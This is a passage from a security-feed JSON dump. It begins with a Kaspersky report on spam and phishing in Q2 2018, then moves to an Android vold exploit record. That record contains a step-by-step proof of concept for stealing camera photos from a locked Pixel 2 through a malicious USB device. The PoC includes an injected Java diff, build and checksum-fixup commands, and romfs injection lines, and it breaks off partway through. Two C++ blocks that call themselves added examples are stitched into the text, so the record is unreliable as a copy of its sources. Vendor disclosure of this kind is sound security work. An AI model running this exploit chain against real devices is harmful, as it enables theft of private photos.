For example, if the original account name contains an underscore, cybercriminals register a new user with two underscores in the name and post messages about cryptocurrency giveaways in replies to the celebrity's authentic Twitter posts. As a result, even a detail-oriented person may have a hard time spotting the fake.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122549/180810-spam-report-q2-18-10.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122549/180810-spam-report-q2-18-10.png>)\n\nTwitter's administration promised to stop this type of fraud a long time ago. One of its first steps was to block accounts that tried to change their display name to Elon Musk, and most probably to other names commonly used by cybercriminals as well. However, the block is easy to lift: the user enters a Captcha and a code sent via text message, after which they can keep Elon's name or change it to anything they want, and the account will not be blocked again. It is also unclear whether Twitter will block the obfuscated names of famous people that cybercriminals often exploit.\n\nAnother measure taken by the social network is blocking accounts that post links to Elon Musk's account. Just as in the previous example, the account can be unblocked by entering a Captcha and confirming a phone number via a code received in a text message.\n\nThis scam has started spreading to other platforms as well. 
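A detection-side counterpart to the lookalike-handle trick described above, written as an added C++ example that is not part of the original report. It canonicalises handles (case folded, the digit/letter confusables 0/o and 1/I/l mapped, runs of underscores collapsed, leading and trailing underscores dropped) and flags a handle that is a different account yet canonicalises to a watch-listed one. The confusable set and the watch-list entries are assumptions for illustration, not verified handles of the people named in the report and not a claim about how Twitter itself matches names.

```cpp
#include <cctype>
#include <initializer_list>
#include <iostream>
#include <string>
#include <vector>

// Lower-cases a handle. Twitter handles are case-insensitive, so two handles
// that differ only in case are the same account, not a lookalike.
std::string lowerHandle(const std::string& handle) {
    std::string out;
    for (unsigned char c : handle) out.push_back(static_cast<char>(std::tolower(c)));
    return out;
}

// Canonical form for lookalike comparison (assumed confusable set for this
// example): lower-case, '0' -> 'o', '1' and 'I' -> 'l', every run of
// underscores collapsed to one, leading and trailing underscores removed.
std::string canonicalHandle(const std::string& handle) {
    std::string out;
    for (unsigned char c : handle) {
        char l = (c == 'I') ? 'l' : static_cast<char>(std::tolower(c));
        if (l == '0') l = 'o';
        else if (l == '1') l = 'l';
        if (l == '_' && (out.empty() || out.back() == '_')) continue;  // leading / repeated '_'
        out.push_back(l);
    }
    while (!out.empty() && out.back() == '_') out.pop_back();          // trailing '_'
    return out;
}

// True when `candidate` is a different account from `official` yet
// canonicalises to the same string (e.g. pavel__durov vs pavel_durov).
bool isLookalike(const std::string& candidate, const std::string& official) {
    return lowerHandle(candidate) != lowerHandle(official) &&
           canonicalHandle(candidate) == canonicalHandle(official);
}

// Returns the watch-listed handle that `candidate` impersonates, or "" if none.
std::string impersonatedHandle(const std::string& candidate,
                               const std::vector<std::string>& watchList) {
    for (const auto& official : watchList)
        if (isLookalike(candidate, official)) return official;
    return "";
}

// Constructed watch-list for the demo (illustrative entries, not verified
// handles of the people named in the report).
const std::vector<std::string> WATCH_LIST = {"elonmusk", "pavel_durov", "VitalikButerin"};

int main() {
    for (const char* c : {"pavel__durov", "e1onmusk", "Pavel_Durov__", "ElonMusk",
                          "VitaIikButerin", "someone_else"}) {
        std::string hit = impersonatedHandle(c, WATCH_LIST);
        std::cout << c << " -> " << (hit.empty() ? "ok" : "lookalike of " + hit) << '\n';
    }
    return 0;
}
```

The check runs well against a stream of reply authors under a protected account's posts: anything that hits the watch-list while not being the watch-listed account itself is the candidate for review, and the canonical form is cheap enough to compute per reply.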
Fake accounts can also be found on Instagram.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10124414/180810-spam-report-q2-18-10-5.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10124414/180810-spam-report-q2-18-10-5.jpg>)\n\n_Vitalik Buterin's fake Instagram account_\n\n### Facebook\n\nOn Facebook, in addition to the aforementioned content distribution through viral threads, cybercriminals often use the advertising mechanisms offered by the social network. We have recorded instances of get-rich-quick schemes being spread through Facebook ads.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122556/180810-spam-report-q2-18-11.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122556/180810-spam-report-q2-18-11.png>)\n\n_Fraudulent website ad on Facebook_\n\nAfter clicking on the ad, the user is redirected to a website where, after completing a few steps, they are offered a reward. To receive this reward, the user must either pay a fee, enter their credit card information, or share some personal details. Of course, the user does not receive any reward in the end.\n\n### Search results\n\nAds with malicious content and links to phishing sites can be found not only on social networks, but also in the search results pages of major search engines. 
This has recently become a popular method of advertising fake ICO project websites.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122602/180810-spam-report-q2-18-12.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122602/180810-spam-report-q2-18-12.png>)\n\n_Users do not always notice the \"Ad\" label next to the ads_\n\n## Spammer tricks\n\nLast quarter, spammers tried the following new tricks to evade filters.\n\n### Double email headers\n\nWhen generating spam emails, spammers inserted two From fields into the email header. The first From field contained a legitimate address, usually one from a well-known organization (whose reputation is untarnished by spam scandals), while the second contained the actual spammer address, which has nothing to do with the first one. Spammers expected the email to be treated as legitimate by filters, forgetting that modern anti-spam solutions rely not only on the technical part of the email, but also on its content. (RFC 5322 permits exactly one From field per message, so a duplicate From header is itself a strong signal for a filter.)\n\n### Subscription forms\n\nIn this case, spam messages arrive in recipients' inboxes in the form of automatic mailing list subscription confirmations. Ordinary websites that allow unlimited user registration were employed to generate them (especially those that allowed the same email address to be used multiple times). Spammers used a script that auto-filled subscription forms, inserting recipient addresses from previously collected (or purchased) databases. The spam content was a short phrase with a link to a spam resource, inserted into one of the mandatory fields in the form (in particular, the recipient name). 
As a result, the user received a notification sent from a legitimate mail address containing a spam link instead of their name.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122609/180810-spam-report-q2-18-13.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122609/180810-spam-report-q2-18-13.png>)\n\n_An example of spam mail sent using the subscription service of a legitimate site_\n\n## Statistics: spam\n\n### Proportion of spam in email traffic\n\nProportion of spam in global email traffic, Q1 and Q2 2018 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122615/180810-spam-report-q2-18-14.png>)\n\nIn Q2 2018, the largest percentage of spam was recorded in May at 50.65%. The average percentage of spam in world mail traffic was 49.66%, 2.16 p.p. lower than in the previous reporting period.\n\n### Sources of spam by country\n\nSpam-originating countries, Q2 2018 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122622/180810-spam-report-q2-18-15.png>)\n\nVietnam, the leading spam-originating country in Q1 2018, fell to seventh place in the second quarter (3.98%) and was replaced at the top by China (14.36%). The USA and Germany, in second and third place, are only one percentage point apart, with 12.11% and 11.12% shares, respectively. France occupied fourth place (4.42%) and Russia fifth (4.34%). Great Britain occupied tenth place (2.43%).\n\n### Spam email size\n\nSpam email size, Q1 and Q2 2018 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122628/180810-spam-report-q2-18-16.png>)\n\nThe results for Q2 2018 indicate that the share of very small spam messages (up to 2 KB) fell 2.45 p.p. to 79.17%. The percentage of 5-10 KB spam messages, on the other hand, grew somewhat (by 1.45 p.p.) 
in comparison with the previous quarter and amounted to 5.56%.\n\nThe percentage of 10-20 KB spam messages changed little, going down by 0.93 p.p. to 3.68%. 20-50 KB spam messages saw a similar trend, their share decreasing by 0.4 p.p. (to 2.68%) in comparison with the previous reporting period.\n\n### Malicious attachments: malware families\n\nTop 10 malware families, Q2 2018 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122634/180810-spam-report-q2-18-17.png>)\n\nAccording to the results for Q2 2018, the most widely distributed malware family by mail was Exploit.Win32.CVE-2017-11882 (10.35%). This is the verdict given to various malware that exploits CVE-2017-11882, a memory corruption vulnerability in the Equation Editor component of Microsoft Office, typically delivered inside Word documents. The share of mail carrying the Trojan-PSW.Win32.Fareit family, which steals user information and passwords, decreased during the second quarter; it lost first place and now occupies second (5.90%). Third and fourth places are occupied by Backdoor.Win32.Androm (5.71%) and Backdoor.Java.QRat (3.80%). The Worm.Win32.WBVB family was the fifth most popular malware with cybercriminals.\n\n### Countries targeted by malicious mailshots\n\nDistribution of Mail Anti-Virus triggers by country, Q2 2018 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122641/180810-spam-report-q2-18-18.png>)\n\nThe first, second, and third places among the countries with the highest number of Mail Anti-Virus triggers in Q2 2018 were unchanged. Germany remained in first place (9.54%), and second and third places were taken by Russia and Great Britain (8.78% and 8.67%, respectively). Fourth and fifth places were taken by Brazil (7.07%) and Italy (5.39%).\n\n## Statistics: phishing\n\nIn Q2 2018, the Anti-Phishing system prevented **107,785,069** attempts to connect users to malicious websites. 
9.6% of all Kaspersky Lab users around the world were subject to attack.\n\n### Geography of attacks\n\nThe country with the highest percentage of users attacked by phishing in Q2 2018 was again Brazil, with 15.51% (-3.56 p.p.).\n\nGeography of phishing attacks, Q2 2018 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122648/180810-spam-report-q2-18-19.png>)\n\n**Country** | **%*** \n---|--- \nBrazil | 15.51 \nChina | 14.77 \nGeorgia | 14.44 \nKyrgyzstan | 13.60 \nRussia | 13.27 \nVenezuela | 13.26 \nMacao | 12.84 \nPortugal | 12.59 \nBelarus | 12.29 \nSouth Korea | 11.66 \n \n_* Percentage of users on whom the Anti-Phishing system triggered, relative to all Kaspersky Lab users in the respective country._\n\n### Organizations under attack\n\n_The rating of attacks by phishers on different categories of organizations is based on detections by Kaspersky Lab's heuristic Anti-Phishing component. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat._\n\nIn Q2 2018, the Global Internet Portals category again took first place with 25.00% (+1.3 p.p.).\n\n_Distribution of organizations affected by phishing attacks by category, Q2 2018._ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122656/180810-spam-report-q2-18-20.png>)\n\nThe percentage of attacks on organizations that may be combined into a general Finance category (banks, at 21.10%, online stores, at 8.17%, and payment systems, at 6.43%) fell to 35.70% (-8.22 p.p.). IT companies were more often subject to threats in the second quarter than in the first. This category saw an increase of 12.28 p.p. 
to 13.83%.\n\n## Conclusion\n\nAverage spam volume of 49.66% in world mail traffic in this quarter fell 2.16 p.p. in comparison with the previous reporting period, and the Antiphishing system prevented more than 107M attempts to connect users to phishing sites, which is 17M more than in the first quarter of 2018.\n\nIn this quarter, malefactors actively used GDPR, World Cup, and cryptocurrency themes, and links to malicious websites could be found on social networks and messengers (users were often distributing them themselves), as well as in marketing messages served by large search engines.\n\nExploit.Win32.CVE-2017-11882 was the most widely-distributed family of malware via mail, at 10.35%. Trojan-PSW.Win32.Fareit fell from the first place to the second place (5.90%), and the third and fourth places were taken by Backdoor.Win32.Androm (5.71%) and Backdoor.Java.QRat (3.80%).", "reporter": "Maria Vergelis", "published": "2018-08-14T10:00:36", "type": "securelist", "title": "Spam and phishing in Q2 2018", "enchantments": {"score": {"modified": "2018-08-14T10:31:27", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "blog", "cvelist": ["CVE-2017-11882"], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-08-14T10:00:36", "id": "SECURELIST:03923D895F0F0B7EB3A51F48002D1416", "href": "https://securelist.com/spam-and-phishing-in-q2-2018/87368/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-08-14T22:18:40", "references": [], "description": "Exploit for Android platform in category local exploits", "edition": 1, "reporter": "Google Security Research", "published": "2018-08-14T00:00:00", "title": "Android - Directory Traversal over USB via Injection in blkid Output Exploit", "type": "zdt", "enchantments": {"score": {"modified": "2018-08-14T22:18:40", "vector": "NONE", "value": 10.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-9445"], "modified": 
"2018-08-14T00:00:00", "id": "1337DAY-ID-30885", "href": "https://0day.today/exploit/description/30885", "sourceData": "When a USB mass storage device is inserted into an Android phone (even if the\r\nphone is locked!), vold will attempt to automatically mount partitions from the\r\ninserted device. For this purpose, vold has to identify the partitions on the\r\nconnected device and collect some information about them, which is done in\r\nreadMetadata() in system/vold/Utils.cpp. This function calls out to \"blkid\",\r\nthen attempts to parse the results:\r\n \r\n \r\n std::vector<std::string> cmd;\r\n cmd.push_back(kBlkidPath);\r\n cmd.push_back(\"-c\");\r\n cmd.push_back(\"/dev/null\");\r\n cmd.push_back(\"-s\");\r\n cmd.push_back(\"TYPE\");\r\n cmd.push_back(\"-s\");\r\n cmd.push_back(\"UUID\");\r\n cmd.push_back(\"-s\");\r\n cmd.push_back(\"LABEL\");\r\n cmd.push_back(path);\r\n \r\n std::vector<std::string> output;\r\n status_t res = ForkExecvp(cmd, output, untrusted ? sBlkidUntrustedContext : sBlkidContext);\r\n if (res != OK) {\r\n LOG(WARNING) << \"blkid failed to identify \" << path;\r\n return res;\r\n }\r\n \r\n char value[128];\r\n for (const auto& line : output) {\r\n // Extract values from blkid output, if defined\r\n const char* cline = line.c_str();\r\n const char* start = strstr(cline, \"TYPE=\");\r\n if (start != nullptr && sscanf(start + 5, \"\\\"%127[^\\\"]\\\"\", value) == 1) {\r\n fsType = value;\r\n }\r\n \r\n start = strstr(cline, \"UUID=\");\r\n if (start != nullptr && sscanf(start + 5, \"\\\"%127[^\\\"]\\\"\", value) == 1) {\r\n fsUuid = value;\r\n }\r\n \r\n start = strstr(cline, \"LABEL=\");\r\n if (start != nullptr && sscanf(start + 6, \"\\\"%127[^\\\"]\\\"\", value) == 1) {\r\n fsLabel = value;\r\n }\r\n }\r\n \r\n \r\nNormally, the UUID string can't contain any special characters because blkid\r\ngenerates it by reformatting a binary ID as a printable UUID string. 
However,\r\nthe version of blkid that Android is using will print the LABEL first, without\r\nescaping the characters this code scans for, allowing an attacker to place\r\nspecial characters in the fsUuid variable.\r\n \r\n \r\nFor example, if you format a USB stick with a single partition, then place a\r\nromfs filesystem in the partition as follows (on the terminal of a Linux PC):\r\n \r\n # echo '-rom1fs-########TYPE=\"vfat\" UUID=\"../../data\"' > /dev/sdc1\r\n \r\nand then connect the USB stick to a Nexus 5X and run blkid as root on the\r\ndevice, you'll see the injection:\r\n \r\n bullhead:/ # blkid -c /dev/null -s TYPE -s UUID -s LABEL /dev/block/sda1\r\n /dev/block/sda1: LABEL=\"TYPE=\"vfat\" UUID=\"../../data\"\" TYPE=\"romfs\"\r\n \r\n \r\nlogcat shows that the injection was successful and the device is indeed using\r\nthe injected values, but vold doesn't end up doing much with the fake UUID\r\nbecause fsck_msdos fails:\r\n \r\n05-29 20:41:26.262 391 398 V vold : /dev/block/vold/public:8,1: LABEL=\"TYPE=\"vfat\" UUID=\"../../data\"\" TYPE=\"romfs\" \r\n05-29 20:41:26.262 391 398 V vold : \r\n05-29 20:41:26.263 391 398 V vold : /system/bin/fsck_msdos\r\n05-29 20:41:26.263 391 398 V vold : -p\r\n05-29 20:41:26.263 391 398 V vold : -f\r\n05-29 20:41:26.263 391 398 V vold : /dev/block/vold/public:8,1\r\n05-29 20:41:26.264 813 2039 D VoldConnector: RCV <- {652 public:8,1 vfat}\r\n05-29 20:41:26.264 813 2039 D VoldConnector: RCV <- {653 public:8,1 ../../data}\r\n05-29 20:41:26.265 813 2039 D VoldConnector: RCV <- {654 public:8,1 TYPE=}\r\n05-29 20:41:26.281 391 398 I fsck_msdos: ** /dev/block/vold/public:8,1\r\n05-29 20:41:26.285 391 398 I fsck_msdos: Invalid sector size: 8995\r\n05-29 20:41:26.286 391 398 I fsck_msdos: fsck_msdos terminated by exit(8)\r\n05-29 20:41:26.286 391 398 E Vold : Filesystem check failed (no filesystem)\r\n05-29 20:41:26.286 391 398 E vold : public:8,1 failed filesystem check\r\n05-29 20:41:26.286 813 2039 D VoldConnector: RCV <- 
{651 public:8,1 6}\r\n05-29 20:41:26.287 813 2039 D VoldConnector: RCV <- {400 48 Command failed}\r\n05-29 20:41:26.288 2532 2532 D StorageNotification: Notifying about public volume: VolumeInfo{public:8,1}:\r\n05-29 20:41:26.288 2532 2532 D StorageNotification: type=PUBLIC diskId=disk:8,0 partGuid=null mountFlags=0 mountUserId=0 \r\n05-29 20:41:26.288 2532 2532 D StorageNotification: state=UNMOUNTABLE \r\n05-29 20:41:26.288 2532 2532 D StorageNotification: fsType=vfat fsUuid=../../data fsLabel=TYPE= \r\n05-29 20:41:26.288 2532 2532 D StorageNotification: path=null internalPath=null \r\n \r\n \r\nFor a relatively harmless example in which vold actually ends up mounting the\r\ndevice in the wrong place, you can create a vfat partition with label\r\n'UUID=\"../##':\r\n \r\n # mkfs.vfat -n 'PLACEHOLDER' /dev/sdc1\r\n mkfs.fat 4.1 (2017-01-24)\r\n # dd if=/dev/sdc1 bs=1M count=200 | sed 's|PLACEHOLDER|UUID=\"../##|g' | dd of=/dev/sdc1 bs=1M\r\n 200+0 records in\r\n 200+0 records out\r\n 209715200 bytes (210 MB, 200 MiB) copied, 1.28705 s, 163 MB/s\r\n 198+279 records in\r\n 198+279 records out\r\n 209715200 bytes (210 MB, 200 MiB) copied, 2.60181 s, 80.6 MB/s\r\n \r\nConnect it to the Android device again while running strace against vold:\r\n \r\n [pid 398] newfstatat(AT_FDCWD, \"/mnt/media_rw/../##\", 0x7d935fe708, AT_SYMLINK_NOFOLLOW) = -1 ENOENT (No such file or directory)\r\n [pid 398] mkdirat(AT_FDCWD, \"/mnt/media_rw/../##\", 0700) = 0\r\n [pid 398] fchmodat(AT_FDCWD, \"/mnt/media_rw/../##\", 0700) = 0\r\n [pid 398] fchownat(AT_FDCWD, \"/mnt/media_rw/../##\", 0, 0, 0) = 0\r\n [pid 398] mount(\"/dev/block/vold/public:8,1\", \"/mnt/media_rw/../##\", \"vfat\", MS_NOSUID|MS_NODEV|MS_NOEXEC|MS_DIRSYNC|MS_NOATIME, \"utf8,uid=1023,gid=1023,fmask=7,d\"...) 
= 0\r\n [pid 398] faccessat(AT_FDCWD, \"/mnt/media_rw/../##/LOST.DIR\", F_OK) = -1 ENOENT (No such file or directory)\r\n [pid 398] mkdirat(AT_FDCWD, \"/mnt/media_rw/../##/LOST.DIR\", 0755) = 0\r\n \r\nCheck the results:\r\n \r\n bullhead:/ # ls -l /mnt\r\n total 32\r\n drwxrwx--- 3 media_rw media_rw 32768 2018-05-29 20:54 ##\r\n drwx--x--x 2 root root 40 1970-01-01 04:14 appfuse\r\n drwxr-xr-x 2 root system 40 1970-01-01 04:14 asec\r\n drwxrwx--x 2 system system 40 1970-01-01 04:14 expand\r\n drwxr-x--- 2 root media_rw 40 1970-01-01 04:14 media_rw\r\n drwxr-xr-x 2 root system 40 1970-01-01 04:14 obb\r\n drwx------ 5 root root 100 1970-01-01 04:14 runtime\r\n lrwxrwxrwx 1 root root 21 1970-01-01 04:14 sdcard -> /storage/self/primary\r\n drwx------ 3 root root 60 1970-01-01 04:14 secure\r\n drwxr-xr-x 3 root root 60 1970-01-01 04:14 user\r\n bullhead:/ # mount | grep '##'\r\n /dev/block/vold/public:8,1 on /mnt/## type vfat (rw,dirsync,nosuid,nodev,noexec,noatime,uid=1023,gid=1023,fmask=0007,dmask=0007,allow_utime=0020,codepage=437,iocharset=iso8859-1,shortname=mixed,utf8,errors=remount-ro)\r\n \r\n \r\nWhen testing with a normal USB stick, the attacker has to choose between using a\r\nvfat filesystem (so that Android is capable of mounting it as external storage)\r\nand using a romfs filesystem (so that the label is long enough to specify\r\narbitrary paths). However, an attacker who wants to perform more harmful attacks\r\ncould use a malicious USB storage device that is capable of delivering different\r\ndata for multiple reads from the same location. This way, it would be possible\r\nto deliver a romfs superblock when blkfs is reading, but deliver a vfat\r\nsuperblock when the kernel is reading. I haven't tested this yet because I don't\r\nyet have the necessary hardware.\r\n \r\n \r\nWhen you fix this issue, please don't just fix the injection and/or the\r\ndirectory traversal. 
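The parser flaw demonstrated above, reduced to a runnable C++ example added here (not code from the original report and not AOSP's fix). parseBlkidLineVulnerable() is a line-for-line replica of the quoted readMetadata() loop, so it reproduces the injected fsType/fsUuid/fsLabel values seen in the logcat output. uuidIsSafe() and mountPointFor() are a hypothetical allow-list check a hardened caller could apply before turning fsUuid into a mount-point name; they are not what Android shipped. The three blkid lines are constructed samples: the first is the romfs output shown in the write-up, the second assumes blkid prints LABEL, UUID, TYPE in that order for the vfat label 'UUID="../##' (the mount at /mnt/media_rw/../## in the strace is consistent with that), and the third is an ordinary vfat stick.

```cpp
#include <cctype>
#include <cstdio>
#include <cstring>
#include <iostream>
#include <string>

struct FsMeta {
    std::string type, uuid, label;
};

// Replica of the readMetadata() loop quoted above. strstr() locates the FIRST
// occurrence of each key anywhere in the line, so a key that appears inside an
// earlier, unescaped LABEL value is matched instead of the real field.
FsMeta parseBlkidLineVulnerable(const std::string& line) {
    FsMeta m;
    char value[128];
    const char* cline = line.c_str();
    const char* start = strstr(cline, "TYPE=");
    if (start != nullptr && sscanf(start + 5, "\"%127[^\"]\"", value) == 1) m.type = value;
    start = strstr(cline, "UUID=");
    if (start != nullptr && sscanf(start + 5, "\"%127[^\"]\"", value) == 1) m.uuid = value;
    start = strstr(cline, "LABEL=");
    if (start != nullptr && sscanf(start + 6, "\"%127[^\"]\"", value) == 1) m.label = value;
    return m;
}

// Hypothetical allow-list check (not AOSP's actual fix): a UUID that is about
// to become a directory name may contain only hex digits and '-', which covers
// vfat's "XXXX-XXXX" and RFC 4122 forms. '/', '.' and friends can never pass.
bool uuidIsSafe(const std::string& uuid) {
    if (uuid.empty() || uuid.size() > 36) return false;
    for (unsigned char c : uuid)
        if (!std::isxdigit(c) && c != '-') return false;
    return true;
}

// Mount point built the way vold builds it ("<base>/<fsUuid>"), but only for a
// validated UUID; returns "" when the parsed UUID is rejected.
std::string mountPointFor(const FsMeta& m, const std::string& base = "/mnt/media_rw") {
    if (!uuidIsSafe(m.uuid)) return "";
    return base + "/" + m.uuid;
}

// Constructed sample lines (not captured from a device); see the lead-in for
// what each one assumes.
const std::string SAMPLE_ROMFS =
    "/dev/block/sda1: LABEL=\"TYPE=\"vfat\" UUID=\"../../data\"\" TYPE=\"romfs\"";
const std::string SAMPLE_VFAT_INJECT =
    "/dev/block/sda1: LABEL=\"UUID=\"../##\" UUID=\"1234-ABCD\" TYPE=\"vfat\"";
const std::string SAMPLE_BENIGN =
    "/dev/block/sda1: LABEL=\"PHOTOS\" UUID=\"1234-ABCD\" TYPE=\"vfat\"";

int main() {
    const std::string* samples[] = {&SAMPLE_ROMFS, &SAMPLE_VFAT_INJECT, &SAMPLE_BENIGN};
    for (const std::string* s : samples) {
        FsMeta m = parseBlkidLineVulnerable(*s);
        std::string mp = mountPointFor(m);
        std::cout << "type=" << m.type << " uuid=" << m.uuid << " label=" << m.label
                  << " -> " << (mp.empty() ? "REJECTED" : mp) << '\n';
    }
    return 0;
}
```

Running it shows the romfs line yielding type=vfat uuid=../../data label=TYPE=, exactly the triple StorageNotification logged, and the vfat line yielding uuid=../##; both are refused by the allow-list, while the benign stick maps to /mnt/media_rw/1234-ABCD. Validating the value is the minimum; as the report argues next, the larger fix is not exposing this parser to a locked device at all.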
I believe that from a security perspective, a smartphone\r\nshould not mount storage devices that are inserted while the screen is locked\r\n(or, more generally, communication with new USB devices should be limited while\r\nthe screen is locked). Mounting a USB storage device exposes a lot of code to\r\nthe connected device, including partition table parsing, vold logic, blkid, the\r\nkernel's FAT filesystem implementation, and anything on the device that might\r\ndecide to read files from the connected storage device.\r\n \r\n \r\n############################################################\r\n \r\nThis is a PoC for stealing photos from the DCIM folder of a Pixel 2 running\r\nbuild OPM2.171026.006.C1 while the device is locked. You will need a Pixel 2 as\r\nvictim device, a corresponding AOSP build tree, a Raspberry Pi Zero W (or some\r\nother device you can use for device mode USB), a powered USB hub, and some\r\ncables.\r\n \r\nThe victim phone must be powered on, the disk encryption keys must be unlocked\r\n(meaning that you must have entered your PIN/passphrase at least once since\r\nboot), and the attack probably won't work if someone has recently (since the\r\nlast reboot) inserted a USB stick into the phone.\r\n \r\n \r\nConfigure the Raspberry Pi Zero W such that it is usable for gadget mode\r\n(see e.g. 
https://gist.github.com/gbaman/50b6cca61dd1c3f88f41).\r\n \r\nApply the following patch to frameworks/base in your AOSP build tree:\r\n \r\n=========================================\r\ndiff --git a/packages/ExternalStorageProvider./src/com/android/externalstorage/MountReceiver.java b/packages/ExternalStorageProvider/src/com/android/externalstorage/MountReceiver.java\r\nindex 8a6c7d68525..73be5818da1 100644\r\n--- a/packages/ExternalStorageProvider/src/com/android/externalstorage/MountReceiver.java\r\n+++ b/packages/ExternalStorageProvider/src/com/android/externalstorage/MountReceiver.java\r\n@@ -20,10 +20,38 @@ import android.content.BroadcastReceiver;\r\n import android.content.ContentProviderClient;\r\n import android.content.Context;\r\n import android.content.Intent;\r\n+import java.io.File;\r\n+import java.io.FileInputStream;\r\n+import java.io.FileOutputStream;\r\n \r\n public class MountReceiver extends BroadcastReceiver {\r\n @Override\r\n public void onReceive(Context context, Intent intent) {\r\n+ System.logE(\"MOUNTRECEIVER CODE INJECTED, GRABBING FILES...\");\r\n+ try {\r\n+ File exfiltration_dir = new File(\"/data/exfiltrated-photos\");\r\n+ exfiltration_dir.mkdir();\r\n+ File camera_dir = new File(\"/storage/emulated/0/DCIM/Camera\");\r\n+ File[] camera_files = camera_dir.listFiles();\r\n+ for (File camera_file: camera_files) {\r\n+ System.logE(\"GRABBING '\"+camera_file.getName()+\"'\");\r\n+ File exfiltrated_file = new File(exfiltration_dir, camera_file.getName());\r\n+ exfiltrated_file.delete();\r\n+ FileInputStream ins = new FileInputStream(camera_file);\r\n+ FileOutputStream outs = new FileOutputStream(exfiltrated_file);\r\n+ byte[] buf = new byte[4096];\r\n+ int len;\r\n+ while ((len=ins.read(buf)) > 0) {\r\n+ outs.write(buf, 0, len);\r\n+ }\r\n+ ins.close();\r\n+ outs.close();\r\n+ }\r\n+ } catch (Exception e) {\r\n+ throw new RuntimeException(e);\r\n+ }\r\n+ System.logE(\"INJECTED CODE DONE\");\r\n+\r\n final ContentProviderClient client = 
context.getContentResolver()\r\n .acquireContentProviderClient(ExternalStorageProvider.AUTHORITY);\r\n try {\r\n=========================================\r\n \r\nThen build the tree (\"lunch aosp_walleye-userdebug\", then build with \"make\").\r\n \r\nZip the classes.dex build artifact of ExternalStorageProvider:\r\n \r\n$ zip -jX zipped_dexfile ~/aosp-walleye/out/target/common/obj/APPS/ExternalStorageProvider_intermediates/classes.dex\r\n adding: classes.dex (deflated 49%)\r\n$ mv zipped_dexfile.zip zipped_dexfile\r\n \r\nDownload the factory image for OPM2.171026.006.C1 and unpack its system partition, e.g. using commands roughly as follows:\r\n \r\n$ unzip image-walleye-opm2.171026.006.c1.zip\r\n$ ~/aosp-walleye/out/host/linux-x86/bin/simg2img system.img system.img.raw # convert sparse image to normal\r\n$ echo 'rdump / walleye-opm2.171026.006.c1/unpacked_system/' | debugfs -f- walleye-opm2.171026.006.c1/unpacked_image/system.img.raw 2>/dev/null # extract filesystem image\r\n \r\nNow build the classes.dex build artifact into an odex file and a vdex file, linking against boot.art from the factory image:\r\n \r\n$ ~/aosp-walleye/out/host/linux-x86/bin/dex2oat --runtime-arg -Xms64m --runtime-arg -Xmx512m --class-loader-context='&' --boot-image=/home/user/google_walleye/walleye-opm2.171026.006.c1/unpacked_system/system/framework/boot.art --dex-file=zipped_dexfile --dex-location=/system/priv-app/ExternalStorageProvider/ExternalStorageProvider.apk --oat-file=package.odex --android-root=/home/user/google_walleye/walleye-opm2.171026.006.c1/unpacked_system/system --instruction-set=arm64 --instruction-set-variant=cortex-a73 --instruction-set-features=default --runtime-arg -Xnorelocate --compile-pic --no-generate-debug-info --generate-build-id --abort-on-hard-verifier-error --force-determinism --no-inline-from=core-oj.jar --compiler-filter=quicken\r\n \r\nThe resulting vdex file would not be accepted by the phone because of a CRC32\r\nchecksum mismatch; to fix it up, 
compile the attached vdex_crc32_fixup.c and use\r\nit to overwrite the CRC32 checksum with the expected one from the factory image:\r\n \r\n$ ./vdex_crc32_fixup package.vdex ~/google_walleye/walleye-opm2.171026.006.c1/unpacked_system/system/priv-app/ExternalStorageProvider/ExternalStorageProvider.apk \r\noriginal crc32: d0473780\r\nnew crc32: 84c10ae9\r\nvdex patched\r\n \r\nPrepare two disk images, each with a MBR partition table and a single partition.\r\nTheir partition tables should be identical.\r\nIn the first image's partition, place a fake romfs filesystem that triggers the\r\nvold bug:\r\n \r\n# echo -e '-rom1fs-########TYPE=\"vfat\" UUID=\"../../data\"\\0' > /dev/sdd1\r\n \r\nFormat the second image's partition with FAT32, and create the following\r\ndirectory structure inside that filesystem (the \"[email\u00a0protected]\" entries are files, the\r\nrest are directories):\r\n \r\n\u251c\u2500\u2500 dalvik-cache\r\n\u2502 \u2514\u2500\u2500 arm64\r\n\u2502 \u251c\u2500\u2500 [email\u00a0protected]@boot.art\r\n\u2502 \u251c\u2500\u2500 [email\u00a0protected]@[email\u00a0protected]@classes.dex\r\n\u2502 \u2514\u2500\u2500 [email\u00a0protected]@[email\u00a0protected]@classes.vdex\r\n\u251c\u2500\u2500 LOST.DIR\r\n\u251c\u2500\u2500 misc\r\n\u2502 \u2514\u2500\u2500 profiles\r\n\u2502 \u2514\u2500\u2500 cur\r\n\u2502 \u2514\u2500\u2500 0\r\n\u2502 \u2514\u2500\u2500 com.android.externalstorage\r\n\u251c\u2500\u2500 user\r\n\u2502 \u2514\u2500\u2500 0\r\n\u2502 \u2514\u2500\u2500 